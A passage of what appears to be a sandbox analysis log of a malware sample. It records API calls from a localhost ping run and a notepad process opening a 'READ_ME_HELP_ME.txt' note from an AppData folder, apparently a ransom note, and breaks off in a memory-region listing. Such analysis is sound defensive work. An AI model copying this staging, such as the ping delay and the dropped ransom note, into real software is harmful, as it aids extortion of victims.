lpUsedDefaultChar=0x0) returned 10 [0046.967] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28910 [0046.967] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0046.967] _fileno (_File=0x76ea4c28) returned 1 [0046.967] _write (in: _FileHandle=1, _Buf=0xe28910*, _MaxCharCount=0x9 | out: _Buf=0xe28910*) returned 9 [0046.967] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0046.967] _fileno (_File=0x76ea4c28) returned 1 [0046.967] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0046.967] LocalFree (hMem=0xe28910) returned 0x0 [0046.967] LocalFree (hMem=0xe38bf8) returned 0x0 [0046.967] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcbf494, nSize=0x0, Arguments=0xcbf490 | out: lpBuffer="诸ã﹤Ë➷\x94䰨盪✧") returned 0x9 [0046.967] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0046.967] _fileno (_File=0x76ea4c28) returned 1 [0046.967] _get_osfhandle (_FileHandle=1) returned 0x28 [0046.967] GetFileType (hFile=0x28) returned 0x2 [0046.967] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf458 | out: lpMode=0xcbf458) returned 0 [0046.967] GetLastError () returned 0x6 [0046.967] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3bc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0046.967] _fileno (_File=0x76ea4c28) returned 1 [0046.967] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0046.967] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0046.967] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28910 [0046.967] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0046.967] _fileno (_File=0x76ea4c28) returned 1 [0046.968] _write (in: _FileHandle=1, _Buf=0xe28910*, _MaxCharCount=0x9 | out: _Buf=0xe28910*) returned 9 [0046.968] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0046.968] _fileno (_File=0x76ea4c28) returned 1 [0046.968] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0046.968] LocalFree (hMem=0xe28910) returned 0x0 [0046.968] LocalFree (hMem=0xe38bf8) returned 0x0 [0046.968] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="诸ã﹤Ë⟘\x94䰨盪✨") returned 0x9 [0046.968] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0046.968] _fileno (_File=0x76ea4c28) returned 1 [0046.968] _get_osfhandle (_FileHandle=1) returned 0x28 [0046.968] GetFileType (hFile=0x28) returned 0x2 [0046.968] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0046.968] GetLastError () returned 0x6 [0046.968] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✨") returned 0x0 [0046.968] _fileno (_File=0x76ea4c28) returned 1 [0046.968] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0046.968] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0046.968] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28958 [0046.968] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe28958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0046.968] _fileno (_File=0x76ea4c28) returned 1 [0046.968] _write (in: _FileHandle=1, _Buf=0xe28958*, _MaxCharCount=0x9 | out: _Buf=0xe28958*) returned 9 [0046.968] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0046.968] _fileno (_File=0x76ea4c28) returned 1 [0046.968] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0046.968] LocalFree (hMem=0xe28958) returned 0x0 [0046.968] LocalFree (hMem=0xe38bf8) returned 0x0 [0046.968] Sleep (dwMilliseconds=0x3e8) [0047.981] IcmpSendEcho2Ex (in: IcmpHandle=0xe26b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe2c1b0, RequestSize=0x20, RequestOptions=0xcbf50c, ReplyBuffer=0xe35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe35270) returned 0x1 [0047.981] InetNtopW (in: Family=2, pAddr=0xcbf4fc, pStringBuf=0xcbf624, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0047.981] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë⛔\x94䰨盪✣") returned 0x16 [0047.981] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.981] _fileno (_File=0x76ea4c28) returned 1 [0047.981] _get_osfhandle (_FileHandle=1) returned 0x28 [0047.981] GetFileType (hFile=0x28) returned 0x2 [0047.981] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0047.981] GetLastError () returned 0x6 [0047.981] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✣") returned 0x0 [0047.981] _fileno (_File=0x76ea4c28) returned 1 [0047.981] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.981] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0047.981] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe380b0 [0047.981] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe380b0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0047.982] _fileno (_File=0x76ea4c28) returned 1 [0047.982] _write (in: _FileHandle=1, _Buf=0xe380b0*, _MaxCharCount=0x16 | out: _Buf=0xe380b0*) returned 22 [0047.982] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.982] _fileno (_File=0x76ea4c28) returned 1 [0047.982] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.982] LocalFree (hMem=0xe380b0) returned 0x0 [0047.982] LocalFree (hMem=0xe37ac8) returned 0x0 [0047.982] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="诸ã﹤Ë⛿\x94䰨盪✼") returned 0x9 [0047.982] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.982] _fileno (_File=0x76ea4c28) returned 1 [0047.982] _get_osfhandle (_FileHandle=1) returned 0x28 [0047.982] GetFileType (hFile=0x28) returned 0x2 [0047.982] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0047.982] GetLastError () returned 0x6 [0047.982] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✼") returned 0x0 [0047.982] _fileno (_File=0x76ea4c28) returned 1 [0047.982] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.982] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0047.982] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28928 [0047.982] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe28928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0047.982] _fileno (_File=0x76ea4c28) returned 1 [0047.982] _write (in: _FileHandle=1, _Buf=0xe28928*, _MaxCharCount=0x9 | out: _Buf=0xe28928*) returned 9 [0047.982] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.982] _fileno (_File=0x76ea4c28) returned 1 [0047.982] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.982] LocalFree (hMem=0xe28928) returned 0x0 [0047.982] LocalFree (hMem=0xe38bf8) returned 0x0 [0047.982] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcbf494, nSize=0x0, Arguments=0xcbf490 | out: lpBuffer="诸ã﹤Ë➷\x94䰨盪✧") returned 0x9 [0047.982] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.982] _fileno (_File=0x76ea4c28) returned 1 [0047.982] _get_osfhandle (_FileHandle=1) returned 0x28 [0047.982] GetFileType (hFile=0x28) returned 0x2 [0047.982] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf458 | out: lpMode=0xcbf458) returned 0 [0047.982] GetLastError () returned 0x6 [0047.982] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3bc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0047.982] _fileno (_File=0x76ea4c28) returned 1 [0047.982] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.982] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0047.982] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28958 [0047.982] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe28958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0047.982] _fileno (_File=0x76ea4c28) returned 1 [0047.982] _write (in: _FileHandle=1, _Buf=0xe28958*, _MaxCharCount=0x9 | out: _Buf=0xe28958*) returned 9 [0047.983] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.983] _fileno (_File=0x76ea4c28) returned 1 [0047.983] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0047.983] LocalFree (hMem=0xe28958) returned 0x0 [0047.983] LocalFree (hMem=0xe38bf8) returned 0x0 [0047.983] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="诸ã﹤Ë⟘\x94䰨盪✨") returned 0x9 [0047.983] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.983] _fileno (_File=0x76ea4c28) returned 1 [0047.983] _get_osfhandle (_FileHandle=1) returned 0x28 [0047.983] GetFileType (hFile=0x28) returned 0x2 [0047.983] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0047.983] GetLastError () returned 0x6 [0047.983] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✨") returned 0x0 [0047.983] _fileno (_File=0x76ea4c28) returned 1 [0047.983] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0047.983] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0047.983] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28910 [0047.983] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0047.983] _fileno (_File=0x76ea4c28) returned 1 [0047.983] _write (in: _FileHandle=1, _Buf=0xe28910*, _MaxCharCount=0x9 | out: _Buf=0xe28910*) returned 9 [0047.983] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.983] _fileno (_File=0x76ea4c28) returned 1 [0047.983] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0047.983] LocalFree (hMem=0xe28910) returned 0x0 [0047.983] LocalFree (hMem=0xe38bf8) returned 0x0 [0047.983] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xcbf418, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0047.983] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xcbf3ec, nSize=0x0, Arguments=0xcbf3e8 | out: lpBuffer="诸ãË᧰\x94䰨盪❏") returned 0x5e [0047.983] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.983] _fileno (_File=0x76ea4c28) returned 1 [0047.983] _get_osfhandle (_FileHandle=1) returned 0x28 [0047.983] GetFileType (hFile=0x28) returned 0x2 [0047.983] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf3b0 | out: lpMode=0xcbf3b0) returned 0 [0047.983] GetLastError () returned 0x6 [0047.983] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf314, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0047.983] _fileno (_File=0x76ea4c28) returned 1 [0047.983] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0047.983] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 95 [0047.983] LocalAlloc (uFlags=0x40, uBytes=0x5f) returned 0xe38cc0 [0047.983] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xe38cc0, cbMultiByte=95, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 95 [0047.983] _fileno (_File=0x76ea4c28) returned 1 [0047.983] _write (in: _FileHandle=1, _Buf=0xe38cc0*, _MaxCharCount=0x5e | out: _Buf=0xe38cc0*) returned 94 [0047.984] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.984] _fileno (_File=0x76ea4c28) returned 1 [0047.984] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0047.984] LocalFree (hMem=0xe38cc0) returned 0x0 [0047.984] LocalFree (hMem=0xe38bf8) returned 0x0 [0047.984] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xcbf3f8, nSize=0x0, Arguments=0xcbf3f4 | out: lpBuffer="诸ãËᨧ\x94䰨盪❓") returned 0x61 [0047.984] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.984] _fileno (_File=0x76ea4c28) returned 1 [0047.984] _get_osfhandle (_FileHandle=1) returned 0x28 [0047.984] GetFileType (hFile=0x28) returned 0x2 [0047.984] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf3bc | out: lpMode=0xcbf3bc) returned 0 [0047.984] GetLastError () returned 0x6 [0047.984] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf320, nSize=0x50 | out: lpBuffer="Ë❓") returned 0x0 [0047.984] _fileno (_File=0x76ea4c28) returned 1 [0047.984] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0047.984] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0047.984] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xe38cc8 [0047.984] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xe38cc8, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0047.984] _fileno (_File=0x76ea4c28) returned 1 [0047.984] _write (in: _FileHandle=1, _Buf=0xe38cc8*, _MaxCharCount=0x61 | out: _Buf=0xe38cc8*) returned 97 [0047.984] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0047.984] _fileno (_File=0x76ea4c28) returned 1 [0047.984] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0047.984] LocalFree (hMem=0xe38cc8) returned 0x0 [0047.984] LocalFree (hMem=0xe38bf8) returned 0x0 [0047.984] IcmpCloseHandle (IcmpHandle=0xe26b80) returned 1 [0047.984] LocalFree (hMem=0xe2c1b0) returned 0x0 [0047.984] LocalFree (hMem=0xe35270) returned 0x0 [0047.984] WSACleanup () returned 0 [0047.985] exit (_Code=0) Thread: id = 52 os_tid = 0x938 Thread: id = 54 os_tid = 0x928 Process: id = "36" image_name = "notepad.exe" filename = "c:\\windows\\syswow64\\notepad.exe" page_root = "0x11625000" os_pid = "0x950" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\READ_ME_HELP_ME.txt" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1614 start_va = 0x890000 end_va = 0x8c7fff entry_point = 0x890000 region_type = mapped_file name = "notepad.exe" filename = "\\Windows\\SysWOW64\\notepad.exe" (normalized: "c:\\windows\\syswow64\\notepad.exe") Region: id = 1615 start_va = 0xb20000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 1616 start_va = 0xb40000 end_va = 0xb41fff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 1617 start_va = 0xb50000 end_va = 0xb5efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 1618 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 1619 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 1620 start_va = 0xbe0000 end_va = 0xbe3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 1621 start_va = 0xbf0000 end_va = 0xbf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 1622 start_va = 0xc00000 end_va = 0xc01fff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 1623 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1624 start_va = 0x7f7c0000 end_va = 0x7f7e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7c0000" filename = "" Region: id = 1625 start_va = 0x7f7e8000 end_va = 0x7f7e8fff entry_point = 0x0 region_type = private name = "private_0x000000007f7e8000" filename = "" Region: id = 1626 start_va = 0x7f7ec000 end_va = 0x7f7ecfff entry_point = 0x0 region_type = private name = "private_0x000000007f7ec000" filename = "" Region: id = 1627 start_va = 0x7f7ed000 end_va = 0x7f7effff entry_point = 0x0 region_type = private name = "private_0x000000007f7ed000" filename = "" Region: id = 1628 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1629 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1630 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1631 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1636 start_va = 0xcb0000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 1637 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1638 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1639 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1658 start_va = 0xb20000 end_va = 0xb2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 1659 start_va = 0xb30000 end_va = 0xb33fff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 1660 start_va = 0xc10000 end_va = 0xc8dfff entry_point = 0xc10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1661 start_va = 0xd10000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 1662 start_va = 0x736e0000 end_va = 0x7373dfff entry_point = 0x736e0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 1663 start_va = 0x74600000 end_va = 0x747e5fff entry_point = 0x74600000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17031_none_a9efdb8b01377ea7\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17031_none_a9efdb8b01377ea7\\comctl32.dll") Region: id = 1664 start_va = 0x74830000 end_va = 0x748a5fff entry_point = 0x74830000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1665 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1666 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1667 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1668 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1669 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1670 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1671 start_va = 0x75110000 end_va = 0x75195fff entry_point = 0x75110000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 1672 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1673 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1674 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1675 start_va = 0x75a50000 end_va = 0x76bfcfff entry_point = 0x75a50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1676 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1677 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 